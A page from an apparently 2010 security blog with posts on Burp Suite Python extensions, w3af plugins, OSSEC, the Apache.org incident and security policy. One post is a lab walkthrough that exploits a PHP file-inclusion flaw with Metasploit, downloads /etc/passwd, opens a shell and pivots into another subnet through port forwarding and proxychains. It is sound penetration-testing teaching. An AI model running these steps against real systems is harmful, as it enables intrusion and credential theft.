David Robert's -castlebbs- Blog

To content | To menu | To search

Thursday 9 September 2010

Running w3af plugins in Burp Suite

I am quite enthusiastic about the Burp Suite Python extension I wrote. This is a Python (Jython) binding written in Java implementing the Burp Suite extension API.

In the to-do list, I mentioned that more examples need to be written to show the benefit of having the Python support in Burp Suite to write extensions.

w3af is a web application attack and audit framework written in Python with a plugin based model. I found interesting to see what's involved in enabling Burp Suite to use w3af plugins.

As a demo/proof-of-concept I created a BurpExtender.py Python extension to load and execute w3af plugins within Burp Suite.

Not all the w3af plugins can be used in Burp mainly because limitations in the BurpExtender API. So for the moment, only plugins from the grep and evasion categories are supported.

While I may look at implementing other categories of plugins, having access to the grep plugins is nice, all the traffic going through Burp will be passively scanned by the plugins, and weaknesses will be reported in the Alert tab and in the console.

How to use it:
  1. Download the BurpSuite w3af plugin
  2. Follow the instructions for the installation of the Burp suite Python extension
  3. You need to select which plugins you want to use - This is in the first lines of the BurpExtender.py:
# Here you define the name of the plugins you want (category.plugin)
plugins = ['grep.domXss',  'grep.error500', 'grep.errorPages', 'grep.feeds',  
           'grep.fileUpload','grep.hashFind', 'grep.httpAuthDetect', 'grep.privateIP', 'grep.ssn',
           'grep.strangeHeaders', 'grep.strangeHTTPCode', 'grep.strangeReason', 'grep.svnUsers', 'grep.wsdlGreper']

You need to specify the path of the w3af python modules. I have tested this program with w3af version 1.0-rc3.

# Here you should define the location of your w3af installation
w3afPath="C:\\local\\Program Files\\w3af\\w3af"
# Example for Unix "/usr/local/w3af/w3af"
  1. Start Burp (example below with Windows):
C:\Burp>java -Xmx512m -classpath burpsuite_v1.3.03.jar;burppython.jar burp.Start Burp
init: Bootstrapping class not in Py.BOOTSTRAP_TYPES[class=class org.python.core.PyStringMap]
BurpExtender.py needs to be in a folder listed below:
['C:\\Burp\\Lib', '/C:/Burp/burppython.jar/Lib', '__classpath__', '__pyclasspath__/']
loading w3af plugins
Loading grep.domXss...                     Success
Loading grep.error500...                   Success
Loading grep.errorPages...                 Success
Loading grep.feeds...                      Success
Loading grep.fileUpload...                 Success
Loading grep.hashFind...                   Success
Loading grep.httpAuthDetect...             Success
Loading grep.privateIP...                  Success
Loading grep.ssn...                        Success
Loading grep.strangeHeaders...             Success
Loading grep.strangeHTTPCode...            Success
Loading grep.strangeReason...              Success
Loading grep.svnUsers...                   Success
Loading grep.wsdlGreper...                 Success

Failed plugins are ignored and won't be proceeded. You can uncomment
the line 'print str(e)' in the module to see the actual exception

While browsing, if issues are passively identified, they will appear in the console and in the alert tab:


  1. As stated previously, not all plugins categories are supported, I may look in the future and please email me if you have this need
  2. I probably need to put more work on the evasion plugins support since there are some issues in relation to the order in which the http headers are sent back to Burp
  3. Some grep plugins won't work out of the box because they require sqlite3 python module which is not available in the Java python implementation used by the python extension (Jython). However, it is possible to have this working using the sqlite jdbc support. Please drop me an email if you need help in implementing this so you will have all plugins working.

Please give me some feedback if you try it: david@ombrepixel.com

Monday 30 August 2010

Extending Burp Suite in Python

In a previous post, I wrote about creating a Burp Suite extension in Java using the IBurpExtender interface. When performing web application security testing, I often need to write small pieces of code to help me in automating some tasks and the code is generally specific the the application I am testing. Whereas I like Java, I think that dynamically typed languages are more efficient for creating small pieces of code quickly and efficiently. However, don't misquote me, dynamically typed languages like Python can also be (and are) used for very large development projects.

python Having used Python for about 8 years now, I found very interesting the idea of creating a Python binding for the Burp Suite. Since Burp is written in Java, I obviously used Jython, the java implementation of Python.

My goal was to allow anyone to write the Burp extensions directly in Python using the same BurpExtender interface. Therefore, if you wrote Burp extensions in Java, you already know how to write them in Python.

First example

This very simple extension replaces the string "java" to "python" in all http responses received by the Burp. This is useless; but it is just to show how easy it is to write an extension in Python. Only those few lines of code are needed:

from burp import IBurpExtender

class BurpExtender(IBurpExtender):
    def processProxyMessage(self,messageReference, messageIsRequest, remoteHost, remotePort,
                            serviceIsHttps, httpMethod, url, resourceType, statusCode,
                            responseContentType, message, interceptAction):
        if not messageIsRequest:
            message = message.tostring().replace("java","python")
        return message

Embedding an interactive python interpreter

Let's look at something a bit more interesting, using an interactive python console to work on some messages proceeded by Burp:

from burp import IBurpExtender
from java.net import URL
from code import InteractiveConsole

class BurpExtender(IBurpExtender):
    def processProxyMessage(self,messageReference, messageIsRequest, remoteHost, remotePort,
                            serviceIsHttps, httpMethod, url, resourceType, statusCode,
                            responseContentType, message, interceptAction):
        if not messageIsRequest:
            uUrl = URL("HTTPS" if serviceIsHttps else "HTTP", remoteHost, remotePort, url)
            if self.mCallBacks.isInScope(uUrl):
                message = message.tostring()
                from pprint import pprint
                c = InteractiveConsole(locals=loc)
                c.interact("Interactive python interpreter")
                for key in loc:
                    if key != '__builtins__':
                        exec "%s = loc[%r]" % (key, key)
        return message

    def registerExtenderCallbacks(self, callbacks):
        self.mCallBacks = callbacks

What this code does basically is: launch a Python interpreter, make all the python namespace available (you can access and modify any field and method that is offered by the BurpExtender object). Is this not cool?

Only messages that are in the Burp Suite scope will be intercepted and made available interactively (Target/Scope tab in Burp). This is done by the line:

 if self.mCallBacks.isInScope(uUrl):

isInScope is a callback function, the mCallBack object is registered by the registerExtenderCallbacks python method.

Below is an example on what is available with the interactive shell. The shell is available on the console used to start Burp suite. When a message is in the scope, the shell is launched.

First, we are within the scope of the processProxyMessage method and have direct access to the different fields.

Interactive python interpreter
>>> pprint(dir())

>>> pprint(message)
'HTTP/1.1 200 OK\r\nDate: Mon, 30 Aug 2010 12:16:40 GMT\r\nServer: Apache/2.2.9 (Fedora)\r\nLast-Modified: Mon, 30 Aug 2010 11:12:52 GMT\r\nETag: "2aa3a-4d-48f088ba1f500"\r\nAccept-Ranges: bytes\r\nContent-Length: 77\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n<html>\n<head>\n<title>Test!</title>\n</head>\n<body>\nHello all!\n</body>\n</html>\n'

>>> print resourceType, responseContentType, statusCode
html text/html; charset=utf-8 200

It is also possible to interact with all the BurpExtender fields and methods:

>>> pprint(dir(self))

It is possible for example to call any Burp method provided by the callback object:

>>> for message in self.mCallBacks.getProxyHistory():
...     message.getRequest().tostring()
'GET /test.html HTTP/1.1\r\nHost:\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv: Gecko/2008121622 Fedora/3.0.5-1.fc9 Firefox/3.0.5\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nAccept-Encoding: gzip,deflate\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nKeep-Alive: 300\r\nProxy-Connection: keep-alive\r\nCache-Control: max-age=0\r\n\r\n'

Adding new options in Burp Suite menus

This only works with the professional version of Burp Suite (minimum 1.3.07)

Now I am going to show how to create a new menu item within Burp that will call new functions written in Python. This code below adds a "Compare parameters" item in the Burp Suite contextual menu. In the Proxy/History tab, you can select two messages, right click and select the new compare function. This code is just an example of what can be done, it compares GET and POST parameters between two requests and tells the differences. It can be useful though because the Burp Suite comparer is not great to compare requests.

from burp import IBurpExtender
from burp import IMenuItemHandler

from cgi import parse_qs

class BurpExtender(IBurpExtender):
    def registerExtenderCallbacks(self, callbacks):
        self.mCallBacks = callbacks
        self.mCallBacks.registerMenuItem("Compare parameters", ArgsDiffMenuItem())

class ArgsDiffMenuItem(IMenuItemHandler):
    def menuItemClicked(self, menuItemCaption, messageInfo):
        print "--- Diff on arguments ---"
        if len(messageInfo) == 2:
            # We can do a diff
            print "Diff in GET parameters:"
            print "Diff in POST parameters:"
            print "You need to select two messages to do an argument diff"
        print "\n\n"

    def diff(self, params1, params2):
            for param in params1:
                if param not in params2:
                    print "Param %s=%s is not is the second request" % \
                          (param, params1[param])
                if params1[param] != params2[param]:
                    print "Request1 %s=%s Request2 %s=%s" % \
                            (param, params1[param], param, params2[param])
            for param in params2:
                if param not in params1:
                    print "Param %s=%s is not is the first request" % \
                          (param, params2[param])

class HttpRequest:
    def __init__(self, request):

    def getParameters(self):
        # get url parameters

        # get body parameters

How to use the python extension

You need the burppython.jar extension. I have created a jar file that contains the jython interpreter so you don't need to install anything else.


  1. You need to download the zipfile attached at the end of this article.
  2. You need to unzip the content in a dedicated folder.
  3. You need to copy the burpsuite jarfile in this folder (something like burpsuite_pro_v1.3.07.jar or burpsuite_v1.3.03.jar)
  4. The python extension (BurpExtender.py) needs to be placed in the Lib subfolder.
  5. You can launch the burp suite using suite.bat or suite.sh

Please send me an email to david@ombrepixel.com for any questions

To be done

A lot needs to be done,

  1. Add the capability of using several python and java extensions at the same time and link them together
  2. Add the capability of dynamically reload a python extension without having to stop-restart Burp
  3. Put the project on a tracking version system like GitHub
  4. Add more Demo that could leverage on the numerous Python libraries that already exist. UPDATE: please see the w3af extension
  5. ..

Friday 6 August 2010

Porting WebScarab functions to Burp Proxy

I think that the "Reveal hidden fields in HTML pages" option from WebScarab is better that the equivalent option in Burp Proxy "unhide hidden form fields". Therefore I ported the WebScarab code in charge of this to Burp Suite as a BurpExtender extension.

Sometime it can save time just unhiding hidden fields to see/modify them when testing a web application. Both Burp Proxy and Webscarab offer this options. However it seems that the "unhide hidden form fields" in Burp only reveals the fields values and not the fields names.

With the native "unhide hidden form fields" option with Burp Proxy, the revealed fields look like:


With the Burp Proxy extension I wrote (with WebScarab code) the name of the fields are displayed before the value:


This code was tested with Burp Suite professional 1.3.07 and the free version 1.3.03.

import java.net.URL;
import java.util.*;
import java.util.regex.*;
import java.io.*;

public class BurpExtender {
    public burp.IBurpExtenderCallbacks mCallbacks;
    public byte[] processProxyMessage(int messageReference, boolean messageIsRequest,
                  String remoteHost, int remotePort, boolean serviceIsHttps, String httpMethod,
                  String url, String resourceType, String statusCode, String responseContentType,
                  byte[] message, int[] interceptAction) {

    if (!messageIsRequest)
                URL uUrl = new URL(serviceIsHttps ? "HTTPS" : "HTTP", remoteHost, remotePort, url);
                // We are only looking at urls under scope with Burp (target tab) and also only text
                // based content-type In some case responseContentType is null, found this is the case
                // when Content-Lenght is 0 identified using mCallbacks.getHeaders()
                if (mCallbacks.isInScope(uUrl) && responseContentType != null
                     && responseContentType.contains("text"))
                    return revealHidden(message);
                    return message;
            catch (Exception e)
        return message;
    public void registerExtenderCallbacks(burp.IBurpExtenderCallbacks callbacks) {
        mCallbacks = callbacks;

    // Code from WebScarab (slightly modified)
    private byte[] revealHidden(byte[] content) {
        /* We split this pattern into two parts, one before "hidden" and one after
         * Then it is simple to concatenate part 1 + "text" + part 2 to get an
         * "unhidden" input tag
        Pattern inputPattern = Pattern.compile("(<input.+?type\\s*=\\s*[\"']{0,1})hidden([\"']{0,1}.+?>)", Pattern.CASE_INSENSITIVE);
        Matcher inputMatcher = inputPattern.matcher(new String(content));
        StringBuffer outbuf = new StringBuffer();
        boolean matchedOnce = false;
        /* matched hidden input parameter */
        while(inputMatcher.find()) {
            matchedOnce = true;
            String input = inputMatcher.group();
            String name = "noname";

            // extract hidden field name
            Pattern namePattern = Pattern.compile("name=[\"']{0,1}(\\w+)[\"']{0,1}", Pattern.CASE_INSENSITIVE);
            Matcher nameMatcher = namePattern.matcher(input);
            if (nameMatcher.find() && nameMatcher.groupCount() == 1){
                name = nameMatcher.group(1);

            // make hidden field a text field - there MUST be 2 groups
            // Note: this way we don't have to care about which quotes are being used
            input = inputMatcher.group(1) + "text" + inputMatcher.group(2);

            /* insert [hidden] <fieldname> before the field itself */
            inputMatcher.appendReplacement(outbuf, "<STRONG style=\"background-color: white;\"> [hidden field name =\"" + name + "\"]:</STRONG> "+ input + "<BR/>");
        return matchedOnce ? outbuf.toString().getBytes() : content;
} // end BurpExtender

You can download the extension as a jar file (attachement below). To use it, you need to launch Burp this way:

java -classpath burpreveal.jar:burpsuite_v1.3.03.jar burp.StartBurp

On Windows based platforms, use a semi-colon character instead of the colon as the classpath separator.

Only the websites that are defined in the proxy scope will see their fields revealed (Target->Scope).

Tuesday 27 July 2010

Metasploit 4.2.1: PHP Meterpreter

metasploitOnly two months after version 3.4.0 of the framework, version 3.4.1 is released with an important number of new features.

Among the new features, I found this one really interesting:

  • PHP Meterpreter - A protocol-compatible port of the original Meterpreter payload to PHP. This new payload adds the ability to pivot through webservers regardless of the native operating system

The meterpreter is an advanced post exploitation system and is one of the best functions within metasploit. If you don't know what it is, I recommend you to have a look at the below:

Below is an example on how to launch a meterpreter session exploiting a Remote File Inclusion vulnerability in a php application. For the purpose of this test, I used the vulnerable version of Autonomous LAN party:

  • My "metasploit server" is on
  • The "vulnerable linux server" hosting the vulnerable web application is on, it is also connected to another subnet: not accessible by the Metasploit server
  • There is a windows "server" on the other subnet:
               _                  _       _ _
               | |                | |     (_) |
 _ __ ___   ___| |_ __ _ ___ _ __ | | ___  _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
                            | |

       =[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 570 exploits - 285 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
       =[ svn r9925 updated yesterday (2010.07.25)

msf > use unix/webapp/php_include
msf exploit(php_include) > set RHOST
msf exploit(php_include) > set SRVHOST
msf exploit(php_include) > set PHPURI /alp/include/_bot.php?master[currentskin]=XXpathXX
PHPURI => /alp/include/_bot.php?master[currentskin]=XXpathXX
msf exploit(php_include) > set PAYLOAD php/meterpreter/bind_tcp
PAYLOAD => php/meterpreter/bind_tcp

We used the unix/webapp/php_include generic exploit with the php/meterpreter/bind_tcp payload, and then we run it:

msf exploit(php_include) > exploit
[*] Started bind handler

[*] Using URL:
[*] PHP include server started.
[*] Sending stage (35521 bytes) to
[*] Meterpreter session 1 opened ( -> at 2010-07-27 00:12:04 +0100

meterpreter >

We now have a meterpreter session, here are examples of commands that are supported by the PHP meterpreter:

meterpreter > sysinfo
Computer: castlebbs-vulnerable
OS      : Linux castlebbs-vulnerable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
meterpreter > cat /etc/hosts       localhost       castlebbs-vulnerables.localdomain       castlebbs-vulnerable  windows-server.localdomain  windows-server
meterpreter > download /etc/passwd /tmp/pass
[*] downloading: /etc/passwd -> /tmp/pass
[*] downloaded : /etc/passwd -> /tmp/pass//etc/passwd

We can obtain a shell:

meterpreter > execute -i -f /bin/bash
Process 5487 created.
Channel 5 created.
  PID TTY          TIME CMD
 5485 ?        00:00:00 apache2
 5486 ?        00:00:01 apache2
 6175 ?        00:00:00 sh
 6176 ?        00:00:00 bash
 6177 ?        00:00:00 ps

Meterpreter for windows system includes much more functions that don't make sense in the context of a php exploitation (eg. DLL injection, migration etc.). But the real good thing with the php meterpreter is that it has a fully functional support for port forwarding and enable also the creation of new routes. For instance, having exploited a RFI on our web application, we can pivot through the webserver and pen-test the windows server on the other subnet still from our Metasploit server.

First, let's have a look at the capability of adding a new route:

msf exploit(php_include) > sessions -l

Active sessions

  Id  Type         Information                           Connection
  --  ----         -----------                           ----------
  1   meterpreter  www-data (33) @ castlebbs-vulnerable ->

msf exploit(php_include) > route add 1
msf exploit(php_include) > route print

Active Routing Table

   Subnet             Netmask            Gateway
   ------             -------            -------      Session 1

It needs to be understood at this stage that this route is not added in the operating system routing table, but on the framework itself. It means that most of the auxiliary modules and the exploits will work directly and the network traffic will be routed through the meterpreter. Below is an example of using the scanner/smb/smb_version on the routed host:

msf > use scanner/smb/smb_version
msf auxiliary(smb_version) > set RHOSTS
msf auxiliary(smb_version) > run

[*] is running Windows XP Service Pack 2 (language: French) (name:CASTLEBBS) (domain:WORKGROUP)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Then let's have a look at the port forwarding capability. While the routing capability of metasploit is nice, as said previously, it is not a route defined at the operating system level on the metasploit server. It means that no software except metasploit can access the routed host directly. The command below will forward the local port 222 (on the metasploit server) to the remote port 22 of the vulnerable linux server.

meterpreter > portfwd add -L -l 222 -r -p 22
[*] Local TCP relay created: <->

Because we didn't upload a custom ssh server, we need to know the credentials to login or (or let's say scanner/ssh/ssh_login was successful). Launching this command:

ssh -p 222 localhost -l user

Will actually open a ssh session on the vulnerable linux server, this is the port forwarding. But there is better now, we can use the ssh port forwarding options to access directly the ports from the windows server. Example below, local port 445 is forwarded to port 445 on the windows server therefore smb tools can be launched locally.

ssh -L 445: -p 222 user@localhost

And to have the bread and the butter, we can you the ssh dynamic port option (-D please see man ssh) with proxychains on the metasploit host, so all traffic is redirected to the vulnerable linux server acting as a socks proxy enabling full access to the subnet(s) connected to

Proxychains configuration (by default)
socks4 9050

# ssh -D 9050  -p 222 user@localhost
# proxychains nmap -sV
# proxychains msfconsole # haha this even worked - but maybe not very useful since metasploit has the route option

Thursday 13 May 2010

OSSEC active response with linux: logging dropped packets

OSSEC is a great piece of software. When you understand well how it works, you can consider using active-responses so it acts really like a Host-based Intrusion Prevention System. 

There are a number of risks in enabling active responses, more details on the active-responses page:

  • Used by attackers as a denial of services attack (activating a response for a large number of legitimate IPs for instance using IP spoofing).
  • False positive: the configuration needs to be well fined-tuned for what level and/or which rules will prompt an active response.
But when the risks are understood, it can be just a great active defense tool, for example blocking in real-time brute-force attacks.

Any custom active responses can be written. OSSEC comes with a set of active responses scripts for Linux, one of them is firewall-drop.sh that add new rules to the linux firewall (iptables) to drop the packets.

This entry is to describe how to enable logging of dropped packets. I find useful to know if the response is efficient. For instance: what packets are being blocked after the response is triggered, how long will the attack continue, etc. This information is useful to tune the active-response timeout.

I like me you want to have logging enabled, since there is no options for that, I propose a patch for firewall-drop.sh:

As showed on this Splunk chart above, it is possible to ensure that the active responses timeouts are correct for a majority of attacks scenarios. At the bottom, in yellow are the active responses: the first bar is when OSSEC started to block the IP the second one is when OSSEC removed the firewall rules hence unblocking the IP. At the top in blue are the packets being dropped by the attacker after the active response was enabled.

This patch works with OSSEC version 2.4.1

Wednesday 21 April 2010

McAfee DAT 5958 deletes svchost.exe

http://www.incidents.org/diary.html?storyid=8656 Signatures update 5958 locks out Windows XP SP3 clients deleting or putting in quarantine the file svchost.exe.

It is definitely not the first time an antivirus delete a critical file on an operating system (eg. AVG removing user32.dll, Symantec update that affected millions of PCs or BitDefender update that caused 64-bit Windows machines to stop working).

Looking at the different posts on various mailing-lists, it appears that some people now need to manually fix up to thousands of PCs depending of the size of their network.

It's time if it's not already done to review your antivirus procedures to include testing and deployment strategies: all signatures won't be deployed on all PCs at the same time. As well as documenting the process you need to follow if you have a new virus that is not detected, you need also to document what you can do if you have a false positive. And... keep your antivirus vendor support contact numbers up-to-date in case you need them!

If it's too late: http://vil.nai.com/vil/5958_false.htm

Saturday 17 April 2010

Apache.org incident: started with a XSS flaw

Apache.org has suffered a targeted attack between the 5th and the 9th of April. The Apache infrastructure team wrote a comprehensive incident report that is worth reading.

I find this report interesting because it is well written, and it is a good example of a successful attack that is not too difficult to understand from a technical point of view. It outlines well that a successful attack is most of the time the result of successive exploitations of different vulnerabilities.


The exploitation of a single vulnerability is often not enough to compromise a system (this can happen though). Most of the time, it is the presence of several vulnerabilities and the smart exploitation of a combination of them that enable attackers to achieve their goals.

It's important to bear this in mind when assessing the security of system. If you use risk classification for vulnerabilities and you only look at them individually you may underestimate the risk.

Reflected XSS risk?

This attack leaded to a compromise of two servers used by the foundation (shell access, one server with root privileges), numerous passwords were stolen, a web application has been modified to steal even more passwords etc. and this wouldn't have been possible without the exploitation of the first weakness: a non-persistent (or reflected) XSS.

This type of cross-site scripting issue on web applications is very common. Because this type of XSS is non-persistent, I unfortunately still often see on security reports a level of risk Minor for this type of XSS. Obviously, a non-persistent XSS won't give you a remote root account, but as you can see on the Apache compromise, this was the first step. Without this first step the apache compromise wouldn't have been possible (at least this scenario).

Ironically, I understood that XSS vulnerability is stepping down from rank 1 to rank 2 on the new 2010 OWASP Top Ten because from now on, the team will focus more on risks that probability. This is my understanding listening to this podcast. (The 2010 OWASP Top Ten is not published yet at the time I wrote this article).

What can we learn from this incident?

In the report, the team explain, what the issues were and how they fixed them (Sections What worked?, What didn't work?, What are we changing?).

As said at the beginning of this article, this attack was not particularly sophisticated. Using XSS to steal a session cookie is a case study, brute force attack is obviously not new, improper file/folders permissions on a webserver is more than common and issues related to storage of passwords are basics as well etc.

Although some of the vulnerabilities on the hacked servers/application could have been fixed before, humans make mistakes and this is not going to change. An important issue in my opinion is that the attack was left undetected for a few days. With the current technology, the Apache team had to be alerted in real time for a least:

  • Brute force attack (hundred of thousands of password combination attack cannot be left undetected)
  • Change of an application administration settings (change the path to upload attachments)
  • Change of an application (New JSP files, JAR file that would collect all passwords on login and save them)

It's a common mistake to focus only on preventive controls. On the report I can't read much about plans for detective controls. Even in the section "What didn't work?" and "What are we changing?" there is no mention of being alerted that something is going wrong.

Today, it is important to have pro-active monitoring on what is happening on our servers. Logs should be monitored and alerts should be raised based on some criteria/threshold, operating systems and applications configuration and program files should be monitored using integrity checking tools etc. Procedures should be in place to monitor and react based on these events. At the end of the day it's people that will take actions so their involvement in the monitoring process should not be overlooked.

Regarding technology for monitoring, many products are available, on the OpenSource side, I would definitely recommend having a look at ossec,  this is a Host Based Intrusion Detection System (HIPS)

Also, it is important to mention that this kind of attack is very common and it's not possible to rely on network infrastructure security to prevent those attacks: firewalls, network Intrusion Prevention Systems etc. are likely to let the attackers in. There was no buffer overflows or usage of unauthorized network ports used in this attack for instance.

Other considerations

  • Tinyurl and the others URL shortening websites are used now to deceive you clicking on the link and being victim of cross-site scripting attacks. You should be careful clicking on these links and I would recommend using the Preview feature.

  • On this attack, once an administrator session was hijacked exploiting the XSS vulnerability, the next steps were possible because of a badly configured web applications: it was possible to copy JSP files to a folder that will execute them. This is an issue I see very often: the operating system user that run the web server should not have the right to write to a folder that execute dynamic web pages.

Friday 12 February 2010

The three most important security policies

What are the top 3 most important information security policies a company can have?

This question was asked on Linkedin and I found it very interesting to read the different opinions given. Based on the answers, I think it is possible to guess differences in people approach of security policies. I found for example, that reading the answers, you can figure out if the person is technology or process minded.

My answer reflects my opinion regarding Information Security. I think that technology is obviously essential to protect information systems. However:

  • without a strong governance structure...
  • ...driving a security program...
  • ...supported by a consistent set of security policies...

... technology can be a waste of money. The cursor should be put somewhere between technology and governance. If it positioned too near technology you will experience these example of issues:

  • No authority to enforce a security requirement (eg. You need to install a great security product on the servers of a new project, but the project manager doesn't want it to be installed, he has the final word because this new application needs to go live as soon as possible). 
  • No consistence in the application of security across the information assets (eg. who care about the security of the old mainframe!, you prefer working on the security of your new virtual infrastructure!).
  • No strategy or alignment with business current and future objectives/initiatives (eg. You keep working on preventing the blue screen of death with the new Microsoft security patches whereas your company plan to acquire one competitor, just connect both networks directly and didn't think someone should be concerned by security).
  • You have many firewalls, intrusion detection systems, proxies, anti-virus, but programmers don't have any secure programming standards and web application programmers have never heard about OWASP.
  • You have many firewalls, intrusion detection systems, proxies, anti-virus, but you are still ensure that you will be aware of an attack because you don't have time to review the logs and you are not too sure if the alerts work.
  • ...
Well, actually I could do a very very long list, it could be funny though, I may try to contact the MITRE to propose a new enumeration: Technology focused security drawback enumeration (TFSDE) :-)

Well, as you probably understood reading these few lines, I am more that convinced that security policies are essential. Policies establish, but also demonstrate governance. I am convinced about the essential need of security policies, but for the right reasons, not to tick a box and have my number of issues decreased when the auditor comes back. That's unfortunately still the main driver for policies and information security in general. 

My Answer to the question:

What are the top 3 most important information security policies a company can have?

This is actually a very good question, and any security professional has to review policies, and needs to prioritize his work. So it makes sense to find out where to start.

I like the work done by Thomas R. Peltier trying to categorize policies in three tier:

  • Global policies (Tier 1)
  • Topic-specific policies (Tier 2)
  • Application-specific policies (Tier 3)

The CISSP describes as well 3 classifications of policies that matches more or less the one from Mr Peltier:
  • Organizational or Program policy
  • Functional, issue specific policies
  • System specific policies

As I have never seen two companies having the same set of policies (even if in a way of another they address the same things), I find it useful to first identify what category they are from.

If you see the set of policies like a pyramid, the policy at the top is the most important and the one that needs to be reviewed first. This is the one in the Tier 1 (Peltier's classification) or Organizational policy (CISSP classification).

Let's call it the "Organizational Information Security Policy" at the top of the pyramid. This policy normally lays out fundamental things like
  • Governance structure for security
  • Senior management commitment
  • lays out strategic and tactical security program
  • Define roles and responsibilities

I like this policy to be easy to read as a reference document for all employees. I like to keep it short (4-5 pages max) I would definitely review this document first. 

The next one I would look at is the Asset classification policy. It needs to be really crystal clear to the company what assets need to be protected, to what extend and who is the owner.

For the third one, if you are responsible for Business Continuity, I would say the Business Continuity Management policy. If this is out of your scope, my third one would be Acceptable use policy.

I definitely think that information security is more about strategy and senior management commitment than trying to address it from the technology requirements, that's why I would definitely start reviewing, updating and have the Tier 1 policies signed off again.

Wednesday 3 February 2010

IBM i security

IBM i is the operating system (formerly known as i5/OS or OS/400) that runs on System i hardware (formerly known as iSeries and AS/400). System i was the IBM mid-range of computer systems. IBM now offer IBM i on their new range of computer systems: Power Systems.

IBM i is used by many industries and generally host the organisations' critical data and applications. Given the classification of the data that is stored/proceeded on those systems, ensuring a high level of security is paramount.

Mid-range computer systems and mainframes has gained a reputation of being very secure. They are known to be secure by design (compared to Windows and Unix operating systems). This belief is generally shared between IT professionals and auditors. However, few security professionals and auditors are familiar with these systems and a comprehensive assessment of these systems may be overlooked.

The company Powertech did a survey of around 200 system i servers (many fortune 100 companies). The result is amazing. Looking at this reports, it seems obvious that the security of those systems should be getting more focus:

  • Almost 10% of enabled user profiles have default passwords. Over half the systems in the study have more than 15 user profiles with default passwords.
  • Too many users have high privileges over the operating system
  • Weak password policies
  • Lack of adequate controls over data: at the object level (platform and database layer) the majority of users has access to any data, hence breaching the need to know and separation of duties basis.
  • 65% of the surveyed systems have no logical access control over network access: one can download the content of a database without any audit log and control at the network layer. Because of the issue described above on object level access control, on 65% of the systems audited, virtually any user can extract or modify any data from database tables without any auditing logs or restrictions. No needs to be a wizard, a simple ftp client or the excel add-on provided with the IBM Client will get the data for you.
  • 18% of the systems have no auditing features activated at all.

What is really interesting is that the vulnerabilities highlighted here are very basic things: Trivial passwords, generic accounts, access control, log/monitoring, no hardening of the security settings etc. All recipes that are used on micro-computers and that are now mature should be applied on IBM i.

Network access control and auditing

Historically, the only way to access those systems was a dumb terminal. Access control was done restricting the user's menu on the terminal. There were not many paths to the database or platform (operating system) layers. There was no real need to apply a consistent object-level access control policy, the only way of accessing the data was through the menu.

With TCP/IP and network connectivity, there are many more points of entry to the data. Ensuring the effectiveness of these controls is obviously more challenging. 

Importance of data classification policies

One of the conclusion that can be reach reading this report is that there is obviously a breach of the security policies of most organisations when it comes to security of there IBM i systems. I believe that almost all fortune 100 companies have information security policies. They just forgot to enforce them for their most critical systems!

This highlight the importance of having sound data classification policies (ISO/IEC 27002 7.2.1 - CobiT PO2.3). The result of this study shows clearly that inappropriate security level is applied on many IBM i systems assessed during the survey - I take the assumption that they proceed critical data. The implementation of a classification and handling policy force the company to identify where is their critical data so this is less likely that an information system is left overlooked by security professionals and help the auditors in defining their risk-based audit strategy.

Regardless of the technology used (mid-range computers, mainframes, micro-computers), the level of security has to be applied in proportion to the value of the data to be protected. Most of the companies have patch management procedures, hardening guides, vulnerability management programs but surprisingly enough, these don't often apply to mid-range and mainframes


  • I The survey can be downloaded from the Powertech website
  • I also strongly suggest that you read John Earl's article on auditing iSeries systems published in the ISACA journal: 
  • IBM i Market

Friday 18 September 2009

Virtual server deployment spanning security zones

Following a question on the cissp mailing list on the risks of virtual server deployment spanning security zones, here is the answer I posted:

Vmware has released a best practice guide about DMZ virtualization. I don't know if your project is with vmware, but I suppose that most of this document is still valuable even with other virtualization tool.


Basically, I think that any option can offer the same level of security but involves different skills and amount of work to mitigate the potential vulnerabilties.

In the second and third option of the document, guest systems from different DMZs are hosted in the same host server. These options can create vulnerabilities mainly because of the increasing complexity that can lead to misconfiguration. There is also issues to enforce separation of duties since the VMWare administrator can modify virtual network settings.

The points above can be mitigated but involve more requirements than the solution with physical separation of trust zones.

With DMZ virtualization, it is even more important that the below is done and this will be very depending on the level of maturity of Information Security and IT in general in each organisation:

  • The relevant IT people should be well trained on the virtualization tool the company uses
  • The VMware systems have to be hardened following best practices, Management zones should be connected on a separate network that is only available to the relevant people.
  • Vmvare patches have to be applied in a timely manner (this can be an issue since all guest systems may need a reboot)
  • Regular configuration audit have to be done to ensure that no misconfiguration has been introduced
  • Stringent change management must be in place in the organisation and no change to the virtual infrastructure should be done outside the change process
Virtualization if far from a being a new toy. This is a great technology that can decrease costs and can offer great DR strategies. This is likely to be a sensitive subject in each organisation and the result of the risk analysis should be well detailed. I think the points above can be used in doing the risk analysis. For example in a company with undersized IT teams, with poor change management process, I wouldn't recommend the DMZ virtualization option (depending on the impact obviously).

- page 1 of 3